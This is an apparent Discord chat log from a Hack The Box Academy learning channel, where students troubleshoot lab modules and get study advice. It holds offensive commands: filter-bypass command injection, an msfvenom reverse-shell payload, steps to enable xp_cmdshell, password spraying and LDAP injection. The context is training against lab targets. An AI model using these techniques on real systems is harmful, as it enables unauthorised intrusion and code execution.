#modules
you wanna break the law and face a judge be my guest
All Right!
I found it, 😭 I'm going to sleep
please can you tell me how I work with HTML and CSS?
Stupid Question, I have the Silver membership so I have access to all Level 1 and Level 2 modules. If I unlocked with cubes I would get permanent access to refer back to modules, how does that work with memberships, do I lose all access to previously completed modules if I don't renew annually?
once you have finished the modules they're permanently yours
Thank you
especially, how do I prepare a login page with CSS?
modules that need good internet should be optimized lol
I wasted a lot of time on these
F*() around and find out, you are going to be praying for capitalism if you get shipped off to jail for doing something stupid
People be taking jokes too seriously
I talked about the whole privEsc thing humorously
And people be acting like cyber police or something 🤣
Start with "Getting Started" module
how do I learn to be a strong web developer or learn cyber security?
where is Getting Started on the website? is this on discord?
thanks u so much
On the site. Search up "Getting Started" in the search option of the HTB site
No problem, mate
thanks a lot,mate
thanks a lot MarcieLee
hi guys, having some difficulties on Premature Session Population (Auth Bypass) from the Abusing HTTP Misconfigurations module. I tried following the steps but still unable to bypass it. would appreciate any help. thanks
oh my bad, does that break the rules?
yo stop fucking cursing at me
✨ no ✨
ight then
either way if you're not here to learn; then you can leave: as this server is for a website called Hack The Box, this channel in particular is related to HTB Academy, a learning-centered platform
Where can i start?
well if your motivation is just to do some simple phishing to get Roblox creds: then no - you can google hacking beginner's bible though to get a rough idea of how to start
Let's be nice to newcomers, shall we?
thats what im saying fr
if you lost your password; then email roblox support my dude
when a lot of newcomers come in here asking how to hack xyz
ok but i want to learn about other things too i just dont know where to start
you get jaded to these types of queries
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
ok I will look at it
That's because they are newcomers 🙂
except they don't wanna learn how to hack, they just wanna get some petty revenge on someone
in which case they can learn from google ¯\_(ツ)_/¯
I actually do though
not the revenge part
People like them should learn the consequences the hard way, that is by getting sued for hacking
What is the point of behaving rudely, mate?
And I don't think this new guy is asking for revenge
it's the way I interpret the request ¯\_(ツ)_/¯
because again, i've been in the server long enough to see a bunch of different people
90% of people that are asking stuff like "How do I get someone's password from xyz" are often not asking for legality
how are my notes for the NFS section of footprinting module?
I'm gonna revise them tomorrow
idk what file format odt is
ok let me convert it to docx
i also don't feel like downloading
the only person to attest to the quality of your notes is yourself
my guy, no one is gonna download random files online lol
can you say that you can do that section from your notes, without needing to reread the section for clarity
upload it to google drive and share the link
there, now you should be able to open it with Word
good note taking is hard to learn at first
i'm not downloading this
ok I will make google drive link
I use chatgpt to compile random resources in a concise format
saves a lot of time
the best notes come from you rewriting info in your own words
actually I will just read the note writing thing
also rewriting helps retain info
ok ya
You are right but sometimes when you don't have much time and need to learn a lot of different topics, compiling your notes this way certainly helps
i'd suggest rewriting what chatGPT spits at you
and make sure it makes sense; as chatGPT can be wrong/hallucinate
Also I have something called "perfection anxiety". When I write my own notes, it feels like they are not "perfect". Maybe there is a mistake here or there. Maybe I will get the wrong idea when I read them afterwards
But I guess they should be better than a beginner note-taker
if your notes make sense to you: that's all that's important
there's no such thing as a perfect note, accept that they're always subject to change based on your needs
if you can relate what you're learning to something you already know: it helps so much better
Right, but I am really anxious and I can't help it
I guess I need to work on my mindset too
i.e. DNS is like a phone switch - it knows where everything should go, and if it doesn't it needs to be routed/find the right route
public DNS is like a global phonebook, where something like /etc/hosts is a local; where it may have your local community's phone number
Yeah, Informal and simple language is better to understand
I will remember that while making notes from next time
ye; break it down as if you're a dum dum that doesn't know what fancy words mean
it's how I try and break down concepts when I assist people with modules, especially when it comes to language barriers
but that's also how my mind works; i have to boil things down to their simplicity to understand it
Can I say that load balancers are just like middlemen who are balancing web traffic among servers?
Currently revising the topic
as long as it makes sense to you
and you can really say, if someone asks, "well if you look at it this way, you can see that blahblahblah"
my notes use a lot of IT support shorthand
if the word "Customer" is important to the phrase i'm rewriting, i'll use Cx
That makes the notetaking process faster
But the problem is remembering all those shorthands
I see
What is your current working field?
none atm
looking at apprenticeship opportunities in my state for Cyber related stuff
if you're in the US, you can use findhelp.org to look for local resources
Like a trainer or coach?
sort of; it's a paid learning opportunity
some of them are several years
you learn stuff and get paid :)
That's really helpful for many people, since there are a lot of resources out there but where most face problem is learning to use them in the proper way and order
Learn and get paid?
ye it's a job
That's a win-win thing
like any trade apprenticeship
Man, wish I was in the States
some companies allow you to apply from overseas, but might require you to move to the states to do work ¯\_(ツ)_/¯
Leaving home for a foreign land is a lot of work
I'm currently trying the Command Injections module, specifically the 'Bypassing Other Blacklisted Characters' section.
Intending to make sure I really understand it, so attempting to bypass a command filter (whoami currently) with a backslash. (ik can do it other ways, but want to use a backslash this time)
Backslash is a blocked character, so trying to use shifting to get it (as I couldn't find backslashes in any env vars that I could yoink).
```bash
tr '!-}' '"-~' <<< [
```
Above is the shifting command the module gives, which includes a single double quote which it doesn't seem to like, so instead of shifting by 1, I'm shifting by 3 (2 uses | which is also blocked).
```bash
tr '!-{' '$-~'<<<Y
```
Adding the ${IFS}s to avoid spaces (also blocked) gives
```bash
tr${IFS}'!-{'${IFS}'$-~'<<<Y
```
Wrapping that in my command gives me
```bash
whoam$(tr${IFS}'!-{'${IFS}'$-~'<<<Y)i
```
Which outputs whoam\i. Is there any bash syntax that I could wrap this in that would evaluate the backslash on the command line?
Thanks :)
(not sure if spoilers count in #modules but will delete/edit if needed 🫡 )
well backslash is an escape character
but it looks like it still should interpret the command
but it looks like it's injecting the character in as a non-escaped character
would that be a problem with something I've already done (eg use of $(cmd)), or something I haven't done yet (eg wrapping the whole thing in some sort of quote/bracket)?
@fathom pendant Took your advice. I am using chatgpt to have a look at my own written notes and see if there is a gap or mistake in my understanding
Hope it will be better than just copy pasting chatgpt's compiled notes
i haven't done this module, just telling you how i'm interpreting what the bash error is ¯\_(ツ)_/¯
you're good, thanks
yeah it looks like that syntax specifically injects the non-escaped character
this actually works in zsh
huh. neat
oh wild
but yeah from experience these kinds of wacky command injections usually don't work very well, there's too much variance between where you're trying to inject and the system interpreting it, often it works in your terminal but doesn't work when you try it
mm yeah
it's annoying cause the module baited me and was like 'haha if you wanna tryhard try and do it with the backslash'
terrible
yeah you can do a single backslash and it works
yeah, i was trying to simulate the escaped backslash in my larger statement, but might be a lost cause
ty for the help though:))
(it could also be your injection is injecting a double backslash)
like two backslash characters?
I'd be very interested if it was, from my understanding the tr command shifts whatever it gets from stdin, so if I only put in one character (the Y), I should only get one char out
it's one of those quirky things with it ¯\_(ツ)_/¯
love technology
Will learning to make my own scripts help in exploiting vulnerabilities like SQLi, XSS or Command Injection?
mm, thats what I was referring to as an escaped backslash
im of the opinion that if you can code something you truly understand the concept, so I'd say yes
eh you won't really ever need to make your own code tbqh
there's already tools that do it for you :D
(but knowing how they work is important)
are traditional tools like sqlmap and burpsuite enough for all hacking tasks?
which is what I appreciate about HTB modules, they slap you with the hard one, then show you "btw this tool existed - the WHOLE time"
no
you'd need to know about stuff for NoSQLi
(businesses not using SQL as a database)
Doesn't this vulnerability have its own toolset?
Say I learn all the concepts and test using both traditional automated tools and manually
will the process make up for not learning to script myself?
Thanks, mate. I thought you were a little bit rude at first but you are really a helpful person.
again; it's mostly just being jaded from seeing on a weekly basis at least 20 people coming in being like "i need help to hack xyz, they are bad person" like dude, just go to the authorities
It's okay. I know it gets annoying at times to see people ask for the same thing over and over again
they use excel instead
sticky note on the desktop
i mean tbh that's safer from an outside perspective, but if the threat is already inside the office lmao git rekt
oh yeah i meant the digital desktop, but yeah just a bro rocking up and seeing all these passwords taped to the monitors 💀
physical pentesting 📈 📈
ah yeah forgot windows had that stickynote feature
i unironically used that for a bit
ye; when I did IT stuff; just common checklist stuff
in the Password Attacks module, bruteforcing took ages for me, since I'm in SEA. I even tried using the Pwnbox US West server with 2-3 ms, still a bit long, any suggestions :((
increase number of threads for hydra, and avoid bruting ssh if you can
pwnbox has other servers internationally
btw
iirc there is an AU one
there's pwnbox server for au and sg, but no academy servers
yeah i chose pwnbox server that close to academy server
eh if you want smoothness with the pwnbox i'd say using the one closer to you is better
they might eventually release edge servers for academy vpn in those regions, the pwnbox release was likely a test release
i mean the delay from pwnbox doesn't matter that much, i want to optimize the time for bruteforcing actually
¯\_(ツ)_/¯
i've found that most people have luck using 48 threads with hydra
if it drops a bunch of agents; you'll need to adjust
how do I manage terminals, browsers and other GUI apps together? It gets really messy for me at times
For multi step encoding / decoding like in
https://academy.hackthebox.com/module/110/section/1052
Is there a good way to do multi step (decode a, pipe into, decode b) in Zap rather than cut and paste and then needing to iterate back to the beginning?
you're better off using something like cyberchef for those
https://gchq.github.io/CyberChef/
The Cyber Swiss Army Knife - a web app for encryption, encoding, compression and data analysis
Thanks, yeah wasn't quite feeling the right tool.
Cheers! 🙂 First of all: I was just recommended HTB academy (I'm not from IT , but interested) and the last few days have been a BLAST, this is great!
I'm currently doing the "getting started" module which, too, has been really good (for a beginner). I just wanted to provide minimal feedback on the "Privilege Escalation" section of that module:
I do know that the intended solution is fairly straightforward and by far easy enough. BUT if you read the text, you have MANY options to approach the problem with more or less no clue which options should be tried (by a beginner) and which ones are rather... "not for now", so to say 😉 I spent hours trying to find out how to transfer scripts from my host to the remote machine, how to execute msfconsole on the remote system, how to download PEASS to the remote machine (--> DNS resolution for github throwing an error), etc. Then I went on and found the webserver on the target machine, but could not access it (no rights, which is very fine). Then I went on and tried to run searchsploit on my local machine with the linux version of the target. This DID uncover public exploits, but I had no clue how to run them on the remote machine 😄 this goes on about cronjobs, etc ^^
I'm not saying any of this is bad, it was a nice hunt, BUT, in comparison to the other interactive sections I've done so far, this was more confusing as the "simple intended approach" was among the latter in the text. Don't get me wrong: having to try several new approaches to get used to them is awesome, but in this case I never knew whether any of what I'm doing is stupid^^. Still, I learned quite a lot, it is great 🙂 Maybe simply re-ordering the exploit approaches in the text a bit might save the next beginner from a lot of likely unintended headache 😄
Write a TL;DR too
Hello, and welcome! Getting Started module has a really nice section covered before the PrivEsc one called "Transferring Files". I don't remember 100% how the PrivEsc there goes, but for example you can probably transfer linpeas with the wget method mentioned in the module
hey there 🙂 yes, it's the section RIGHT AFTER the one I was talking about 😄 ... which, in hindsight, could have been a clue as to NOT try this path. But thanks! I was really just trying to share my awesome experience and the minor bump in it 😉
Oh, it is. That is pretty weird indeed how the section is covered right after 😄 Good feedback ^^
Great to hear that it didn't discourage you though. The modules are generally great at explaining things. Are you on a specific path, or are you just doing Getting Started for now?
In theory, I fully get how one can see the current structure as logical. Yet, parts of the "privilege escalation" chapter require some file-transfers (IF they would be required in the interactive part), which is only addressed / introduced afterwards.
As for your question: I started with the "SOC Analyst"-path, but felt like a tiny bit too noob for that (really not by much, but I had to google more terms than felt correct) and then switched to the "getting started" path. This feels like the absolutely right decision. Even to a point where I felt like the "getting started" module should have been advertised more heavily for beginners after account creation 😄 It's really nice 🙂
generally you should try the low hanging fruits first before doing the more complicated exploits. if you're new to this field, I'd recommend to start with the Information Security Foundations path
That one is already bookmarked as "to-do next" for me, yes! 🙂 "getting started" simply sounded EVEN MORE beginner-ish (and much shorter). About "starting with low-hanging fruits": yes, absolutely. But in the context of the "Privilege escalation"-section, I simply did not know which approach would be low-hanging (but I guess all my detours made me feel like "this is not the right way" simply because it felt too difficult). I usually simply follow the text-examples step by step, try to understand them and then get the flags 🙂 in this section, this approach caused (minor!) problems on my end^^.
And thanks! 🙂
Hello there, could anyone give a hand with the Injection Attacks Skill Assessment? I have identified the PDF exploit but can't find the internal web app, thanks in advance
Hello need help on Attacking Thick Client Applications please. I'm following the instructions in the x64dbg to try to find in the Restart-OracleService.exe the Type MAP with protection RW but nothing appears..
Have a look at the configuration files of the web server.
Can you tell me the file name? I've looked through everything, I found only ip 192.168..... in hosts. I tried different ports, nothing helps.
|| ports.conf||
you can refer to walkthroughs of PivotAPi
Thank you, I saw these two ports, and I tried them on two ip.
I realised what my mistake was!!! Thank you. I'm on my way.!!
God damm... Many thanks for this
Hello! I got a little stuck at Active Directory Enumeration & Attacks part 2.
The current question is "Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host." And I have the connection string from the last question. I am trying to connect to the SQL01 host with mssqlclient. Doesn't really work. Can anyone give me an idea what's wrong? Maybe the username is not correct?
are you sure that's the right user?
not really, i was trying DC01 as username as well as mssqlsvc
check the file where you found the connection string
yeah it said computername environment variable
it was from DC01
thats the computername
at least the hostname
read it carefully, the username is inside
Try ipconfig
same result
Are you using windows
Try ifconfig
worked , thanks!
Welcome
Does anyone have an idea on how this is arp poisoning and perhaps could explain it?
Hey I'm on Attacking Common Applications, "Attacking LDAP"
trying LDAP injection
For example, suppose an application uses the following LDAP query to authenticate users:
(&(objectClass=user)(sAMAccountName=$username)(userPassword=$password))
if an attacker injects the * character into the $password field, the LDAP query would match any user account with any password that contains the injected string. This would allow the attacker to gain access to the application with any username,
is this the right approach to inject $password = " * "; ?
||ldapsearch -H ldap://ldap.example.com:389 -D "cn=admin,dc=example,dc=com" -w secret123 -b "ou=people,dc=example,dc=com" "($password = " * ";)"||
I do know how arp poisoning works, I just can't seem to understand how this is arp poisoning.
why is that not arp poisoning 
if you're using ldapsearch then password is specified with -w
After an eternity of trial and error I did it on the attackbox, but on my own VM I couldn't even capture the hash xD
What is the new certification 'CWEE' that is coming soon?
Oh nice, that path looks awesome
Who knows about project AI AGI?
Module : Windows Priv Esc
Section: Dns Admins
My problem is the connection, xfreerdp is always going down. So I do what the section says and I'm in the DnsAdmins group but can't read the flag, anybody able to help?
damn 😂 at least u did it
Anyone able to give me a pointer real quick ? " Perform an Nmap scan of the target and identify the non-default port that the telnet service is running on"
I've run multiple scans but still can't get that telnet service to pop up
check the errors that are displayed.
The files do not seem to exist
Hi guys! I'm just getting onto the platform and I'm not getting through the Linux Fundamentals ❤️ ssh login. I'm kind of lost with the VPN and the ssh, whether I have to do it in the terminal, in a virtual machine. I don't have more instances btw. Can anyone help this noob?
reset wait 5 mins and try again
If you don't have more instances you'd probably have to (use a VM)
Aaa okay thanks man
In module: PIVOTING, TUNNELING, AND PORT FORWARDING, skills assessment. What am I missing? I created a windows payload with msfvenom: msfvenom -p windows/x64/meterpreter/reverse_https lhost=172.16.5.15 -f exe -o backupscript.exe LPORT=8080 and used the internal ip of the pivot host. Then I transferred it to the windows machine. After that I set up metasploit multi/handler.
payload => windows/x64/meterpreter/reverse_https
lhost => 0.0.0.0
lport => 8000
Then I started remote forward from ssh. ssh -R 172.16.5.15:8080:0.0.0.0:8000 webadmin@$IP -vN -i id_rsa
And when I run that payload in windows machine I dont get meterpreter session.
The message was probably too long.
Read and follow #welcome to solve the problem
Yoo are you a bot
Sure, beep boop 🤖
Lol bro you funny af
Take some rest 😂
smbclient not wanting to connect to the host to list any shares, I'm using the correct syntax for smbclient right?
I noticed that too, but yes it is, just refreshed my pwnbox vm and attacker machine 5 min ago. I keep getting these responses
*target machine
are you connected to the internet?
🤓👆
lolof course
part of the CPTS path I believe, Getting Started - Service Scanning
im going to simply restart my laptop lmfao
Module: Pass the Hash
Issue: I did all of the questions last night but left the bonus one for today - I've tried resetting the machine, regenerating the VPN config file, giving the machine some alone time before tackling it. I can't get it to run mimikatz / any other command which would fetch me the user hashes. I've tried evil-winrm / impacket / reverse shells without luck. This is the closest I've come in the past 20min of troubleshooting. There's no output to commands. I'm unsure how to get around this issue.
The question for reference: Optional: John is a member of Remote Management Users for MS01. Try to connect to MS01 using john's account hash with impacket. What's the result? What happens if you use evil-winrm? Mark DONE when finished.
In the Windows Privilege Escalation Module, in the sections Windows Desktop Versions (https://academy.hackthebox.com/module/67/section/913) and Windows Server (https://academy.hackthebox.com/module/67/section/912) they give an example of an exploit, then in the evaluation section they instruct you to use the exploit to get the flag on the Administrator's desktop. They also tell you to try other exploits to get system access? What are some exploits other than the given examples that you guys have had success with in the sections Windows Desktop Versions and Windows Server?
Module: AD Enumeration & Attacks - Skills Assessment Part II Q. Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host.
I tried everything I know basically. Last thing I did was to try a reverse shell through xp_cmdshell but that's not working... what am I missing?
Thanks!
Module: Introduction to networking
Section: Wireless Networks
There are two things which bothered me a little bit. While overall the course is really nice, it says that following things can be modified to improve WiFi security:
- disable SSID broadcasting
- enable MAC filtering
However, there is nothing about disabling WPS - which I think should be also done - isn't this still relevant?
I am not entirely convinced that disabling SSID broadcasting and enabling MAC filtering should be advertised. Or maybe my understanding is wrong - and we should always do that in case someone somehow gets our wifi password, but will not have enough knowledge to change his MAC address in order to gain access to the network.
What are your thoughts?
hi everyone, can someone help me in last step of attacking common services lab hard?
|| I have already impersonated john user and execute the commands to activate cmd on remote server||
|| but I cant retrieve the flag due to syntax error||
|| EXECUTE('SELECT * FROM OPENROWSET(BULK N"C:/Users/Administrator/Desktop/flag.txt", SINGLE_CLOB) AS Contents') AT [LOCAL.TEST.LINKED.SRV] ||
|| [-] ERROR(WIN-HARD\SQLEXPRESS): Line 1: Incorrect syntax near 'N'. ||
Hacker
also tried this
|| EXECUTE('xp_cmdshell "whoami"') AT [LOCAL.TEST.LINKED.SRV]||
[-] ERROR(WIN-HARD\SQLEXPRESS): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
@native turtle You have to enable usage of xp_cmdshell first
How do I find persistent registry keys in Velociraptor?
Then you should not be getting that error and you can type commands as NT\Authority
idk
|| EXECUTE('sp_configure "show advanced options", 1') AT [LOCAL.TEST.LINKED.SRV]||
I did this and the other
with the correct response output
but then when I try to execute xp_cmd on remote server it dumps the error
@native turtle Did you run all these commands?
```sql
-- To allow advanced options to be changed.
EXECUTE sp_configure 'show advanced options', 1
GO
-- To update the currently configured value for advanced options.
RECONFIGURE
GO
-- To enable the feature.
EXECUTE sp_configure 'xp_cmdshell', 1
GO
-- To update the currently configured value for this feature.
RECONFIGURE
GO
```
In the remote server
I figured it out
I dont know why I was using
EXECUTE('sp_configure "Ole Automation Procedures", 1') AT [LOCAL.TEST.LINKED.SRV]
and not xp_cmdshell
Hi folks, i'm trying to get the flag In the Privileged Access section of the AD Module, however using PowerUp SQL I get no output. Any pointer ?
PS C:\tools> Invoke-SQLOSCmd -Verbose -Instance "172.16.5.150,1433" -username "inlanefreight\damundsen" -password "XXXX!" -Command "type C:\Users\damundsen\Desktop\flag.txt"
VERBOSE: Creating runspace pool and session states
VERBOSE: Closing the runspace pool
I used impacket mssqlclient.py in the end but still curious
I think you have to supply sql commands to it
I checked here for example, seems pretty similar to what I did
https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/abusing-ad-mssql#mssql-rce
¯\_(ツ)_/¯
invoke-sqloscmd doesn't auto enable xp_cmdshell it seems
basically, powershell function is too old to be useful to modern targets
hacktricks seems to say it checks and enable if needed, also when using impacket, seems it was on by default
SQL> enable_xp_cmdshell
[*] INFO(ACADEMY-EA-DB01\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
[*] INFO(ACADEMY-EA-DB01\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
Maybe that's the issue then 🙂
can access it without issues
Working for me
trying to enumerate vHosts on info gathering - web edition ... can't seem to get anything... So far I've tried using different variations of ||ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/namelist.txt -u <ip> -H "HOST: FUZZ.inlanefreight.htb"|| and I haven't had anything short of thousands of errors... Am I on the right track? A nudge or hint would be nice
Here's the syntax I used for a similar purpose. Note the FUZZ variable.
ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://topology.htb/ -H "Host: FUZZ.topology.htb" -fw 1612
Wrong person 
also, the -fw is to filter results based on various criteria. Essentially you want to get the answer that is different from the failing ones by filtering results
anyone know why I can't crackmapexec password attacks └─$ sudo crackmapexec smb 10.129.41.174 -u usernames.txt -p /usr/share/wordlists/fasttrack.txt
SMB 10.129.41.174 445 ILF-DC01 [*] Windows 10.0 Build 17763 x64 (name:ILF-DC01) (domain:ILF.local) (signing:True) (SMBv1:False)
Traceback (most recent call last):
File "/usr/local/lib/python3.11/dist-packages/impacket/smbconnection.py", line 278, in login
return self._SMBConnection.login(user, password, domain, lmhash, nthash)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/local/lib/python3.11/dist-packages/impacket/smb3.py", line 1040, in login
if packet.isValidAnswer(STATUS_SUCCESS):
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/local/lib/python3.11/dist-packages/impacket/smb3structs.py", line 458, in isValidAnswer
raise smb3.SessionError(self['Status'], self)
impacket.smb3.SessionError: SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
During handling of the above exception, another exception occurred:
ValueError: too many values to unpack (expected 2)
sorry, it was for @grizzled schooner 😮
lmfao
Attacking Active Directory & NTDS.dit
any particular reason you used subdomains-top1million...... instead of namelist.txt? It's what they had in the module so I thought it would be based off of that
I'll give the other wordlists a try though
thanks
Not sure what is in namelist, but the subdomain + domain would make a valid HTTP Host 🙂
Also, mind :FUZZ the wordlist.txt:FUZZ
I'm doubtful. A different link gave a warning about the command that xp_cmdshell is not enabled by default. Hacktricks often just steals content from random other places and doesn't verify. I'd use them for quick attempts, but I don't trust it implicitly to be right.
can't say it's mandatory but that's how I did 😄
They've even stolen academy content
yeah for sure, thanks... I'll look into those
Probably some incompatibility with python libs. Try the netexec tool instead
what does netexec do
It's the updated fork of crack map exec
It's the same tool
but CME is not maintained anymore and I had a few conflicts with python libs due to it
i c ok thanks
the original author wanted to start selling new cme updates first, but the actual devs making the updates wanted to keep it pure open source so they left and started netexec. So it's literally the same tool/code except that's where all new updates and fixes are going. They just changed the name because the other guy got pissy
bmi, I'm still having some troubles, I noticed that the module says you need vHost www.inlanefreight.htb so I edited the syntax to be ||"ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/namelist.txt:FUZZ -u https://10.129.58.110 -H "HOST: FUZZ.www.inlanefreight.htb" -fw 2000 -fs 2000"|| as well as the list you used... I've run this a couple different ways it seems and I'm only getting errors.. do I need to add the ip to /etc/hosts?
Why are you fuzzing a.www.inlanefreight.htb
(The www is to give you an idea of a positive hit)
FUZZ.inlanefreight.htb
so my thought process was, if they're telling me that I need vHost www.inlanefreight.htb, maybe it wanted xxx.www...... so I wasn't sure
Incorrect thought process
good to know
www.inlanefreight.htb is one of the vhosts
I did that before, and I'm getting nothing but errors, so I tried expanding the -fs and -fw as well... but only errors
I run without fs and fw at first to see whats the trash
what error you get ?
doesn't give me an error message, just shows "Errors: the number of items in whatever text file I've used"
?
when sharing errors do not paraphrase them
Also screenshots are a thing
yes you need to add the ip
are you getting errors like
```
agirenconscience [Status: 403, Size: 151, Words: 3, Lines: 8, Duration: 8ms]
agirklmext [Status: 403, Size: 151, Words: 3, Lines: 8, Duration: 8ms]
agirpourlatransition [Status: 403, Size: 151, Words: 3, Lines: 8, Duration: 8ms]
```
?
isn't that what -u is in this case?
Hi, can someone give me a hint on the advanced SQL injection skill assessment? I managed to find the SQL injection and dump the email, but something is blocking me from dumping the password
Oh why are you using https
Most academy targets will be http
Only time I used https was nessus iirc
... well, that changed everything
Because nessus uses https
Yea
for real, I didn't even realize
Because you didn't bother reading your own command
mb
It happens
nxec STATUS_LOGON_FAILURE, does this mean the password is wrong or the port messed up something?
You'd only get a logon failure if the user/pw combo fails
i c ok so it is working, thanks
could I export the results of a ffuf containing word count and everything to a text file ?
yeah I'm just running into text editor saying that the file was too long LOL
yeah I tried to filter by using | grep words: 3 (and moved the number up), but bash isn't saving the entire output when it runs so I don't think it's working right
Yes -o
I think default is json, not sure rn
Has anyone here ever successfully used sudo with openssl to get a reverse shell?
While file reading and writing work well, I've never been able to use the GTFObins trick to get an elevated shell.
Reference: https://gtfobins.github.io/gtfobins/openssl/#sudo
Ffuf has built in filtering
What module is this in reference to, this doesn't sound academy related
Read #welcome to find out how to access more of the server
Careful with revealing stuff for Attacking Enterprise, as most do it blind
I haven't done this module so I can't help you
Oh, sorry. Hope you didn't read the spoiler marked stuff
Upload linpeas and see what that might lead you to
I have everything but the specific vHost that starts with "d". I figured it would've been ||dev-admin.inlanefreight.htb|| but it isn't... am I missing something lol... I ran through the top1million-5000 and sorted by the amount of words (the previous 4 answers had 3 words) and nothing came up...
Maybe the word count is misleading
Perhaps size is the better way
Like I said, they use www to give you an idea what to filter
-f[n] is a negative filter, -m[n] is a positive (match) filter
When using -fs it says you can use a comma-separated list of sizes and ranges... so could I do -fs 90,110 to have it output sizes between that range?
Again -fs is a negative, meaning it will discard anything that matches it
so would -mn 90,110 make it match everything within that range?
[n] is just a substitute for whatever mode you're matching
yeah I meant to put s
Iirc you'd need to do 90-110, comma separation is saying a OR b
yeah that was it thanks, got my answer
I’m on an iPad atm and was wondering if i could do academy modules on it instead of a regular pc
Theoretically yes. You can use the PwnBox. But it is very limited and no fun
hello, i have an issue with the Game Reversing & Modding skill assessment. i passed the first step, but when i have to let the game connect to the remote instance, i see in BepInEx that Fixman cannot connect to the instance (so i can't intercept in Burp) [Yes i'm connected to the vpn]
What is a good place to start with HTB Academy, I have the student subscription. I am getting lost in how much content there is
Is there maybe a wordlist provided on the academy page in 'resources'?
yeah I found it
Cool
if your fundamentals are weak do the InfoSec Fundamentals pathway first.
Otherwise absent any other motivation, just follow the CPTS track
The certified pentester specialist is cpts
thank you
You need a paired keyboard
Can anyone help with the xpath blind exploitation module? I've been at this 3 days and the guide is unclear at a certain point. Not sure if it's intended or not, but now I'm just doing the same commands over and over
What is a step? Is it anything with a bold heading and the ensuing instructions or is it the command/query?
So far I’m following the guide and it doesn’t work as intended past a certain point.
Friends, good evening! Can anyone tell me about Supply Chain Attacks:Skills Assessment?
I found the gitlab host (credentials don't match)
hey i just finished the nmap network enumeration module. In the hard lab, why does ncat successfully connect to the port i'm trying to retrieve the flag from IF I use --source-port 53 but not --source-port 80 (an open port) or an unspecified source port
DNS proxying
you're making the request as if you're a DNS (port 53 is known as the DNS port)
so it treats it as if you're querying it from a normal method
Specifically Exfiltrating the number of child nodes. I don’t understand the wording when it talks about going to the previous step to target the node name I just exfiled
A step is whatever you did previously
Yeah
hello it says in the section that it provides us with a list of words to list users but I can't find it :/ https://academy.hackthebox.com/module/112/section/1072
@marsh echo
Hahaha I’m already in the industry but some of the wording…bro wtf
aaH thanks a lot 😉
Yeah it's like sometimes the writer is like "yeah go back to the thing" but what they want you to inject and the payload don't match up based on wording hahahahahha
Christ
This is wild, I can read I promise, and of course there's no official write up so I just keep doing the module top to bottom and get stuck at the same place
Where are the official admins?
I’m so angry hahahahah 4 days same module because someone wouldn’t add context
Please DM if you’ve done senior path xpath module.
I guess it’s because this module is new so not many have done it
Tbh it's likely just you misreading but I haven't done the path to be sure
Annual sub
Yes, that's what annual means
It’s possible @fathom pendant but I’ve gone to bed 3 times and still can’t read? Interesting
Can anyone give me a nudge on the file inclusion skill assessment? So far I have found a php filter to retrieve source code of local php files. I have examined the source code of all php files I have managed to fuzz and there isn't anything useful. Am I not enumerating enough?
Skill issue. But I'd recommend messaging website support if you feel like context is missing
I speak English
ChatGPT won't help in this case
Obviously it's a skill issue, that's why I'm doing the module.
If I had the skill I wouldn’t do the module. I don’t understand what you wanted to get out of calling it a skill issue.
Post in erratum
Chill, it wasn't a personal dig at you
But seriously, messaging support/post in erratum
I suffer enough, thanks
Thanks I'm cured
Yes I did
I tried other wrappers but didn't have any success
And I tried the filter chain to get RCE which is definitely out of scope for the module
Alright thanks, been trying to get around the extension appending at the end but nothing yet
Nevermind, I'm dumb
garfield probably ate it
I don't understand why the commands don't work on the imap server :/ to find the admin email
You need to prefix imap commands
1 <command> <args>
If you search this channel you'll find a few imap articles regarding commands
ok thanks
Try resetting the target
i reset it but nothing :/
my notes says you need to use A1 as a prefix
I connected with openssl s_client -connect 10.129.211.60:993
how did you find the prefix knowing that in the module it's 1?
it's been really long since I did that module, can't find the original article that I used for it but this should work
https://book.hacktricks.xyz/network-services-pentesting/pentesting-imap
You can use any prefix afaik
Oh... did you log in?
hmm yeah that seems like the case
That's likely why it's failing if you're not logged in as a user
I thought there's a different error message if you aren't logged in
ok my bad 🙂
oh so you do need to use A1 for this
No
Their first command had user:password
Imap does user[space]password
right
yess I didn't notice :/
It happens
Did you ever figure this out, I'm stuck with the same problem
yess but it was not simple
I can DM me
you're likely using the wrong hash for krbrelayx, use the nt hash of callum.dixon instead
I dislike how the SSTI part of the SS module goes from "hey look, 7*7 is fun" right into
"Register a function as a filter callback via registerUndefinedFilterCallback
Invoke _self.env.getFilter() to execute the function we have just registered".
It's an insane increase in difficulty.
hi, i have a problem in the Logrotate section of the Linux Privilege Escalation module. i do all the steps required, however i do not get the "done" message at the end of the command. is there anyone who could help me? I've tried editing the access.log file manually for it to rotate, having it copy the flag or spawning a reverse shell.
I've compiled it on the victim's machine and I've tried multiple payloads, all with no success
nvm
wrong command
||take off the -c and -s from the exploit command and it should work||
Just want to confirm that the template referred to in the Documentation & Reporting Practice Lab is the sample report that can be downloaded from the resources? Or was I supposed to find a template from the testing VM (I only saw the obsidian notebook)?
Also, making reports seems intimidating and challenging 😅
there's a template report for cpts pinned in #cpts
Thank you very much!
What does the tilde(`) do?
also this looks like a walkthrough of a machine; did you mean to post in #starting-point ?
ok i'll post there from now on then
but chatgpt says it's command substitution
i have no idea what command substitution is either
basically
have you ever done a command like for x in $(cat file) type deal? it's that
I didn't do too much bash scripting actually :/
using backticks is considered deprecated
i mean it's not really bash scripting
i just used an example
i see
but for the most part it's injecting a command in the middle of another one
